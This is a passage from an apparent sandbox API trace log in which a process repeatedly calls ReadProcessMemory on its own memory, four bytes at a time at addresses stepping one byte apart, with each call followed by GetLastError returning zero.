lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400140, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400141, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400142, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400143, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400144, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400145, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400146, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400147, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400148, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400149, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400150, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400151, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400152, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400153, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400154, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400155, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400156, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400157, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400158, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400159, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.331] GetLastError () returned 0x0 [0329.331] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400160, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400161, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400162, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400163, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400164, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400165, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400166, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400167, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400168, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400169, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400170, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400171, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400172, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.332] GetLastError () returned 0x0 [0329.332] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400173, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400174, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400175, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400176, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400177, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400178, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400179, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400180, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400181, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400182, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400183, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400184, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400185, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400186, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400187, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400188, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400189, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.333] GetLastError () returned 0x0 [0329.333] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400190, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400191, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400192, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400193, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400194, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400195, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400196, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400197, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400198, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, 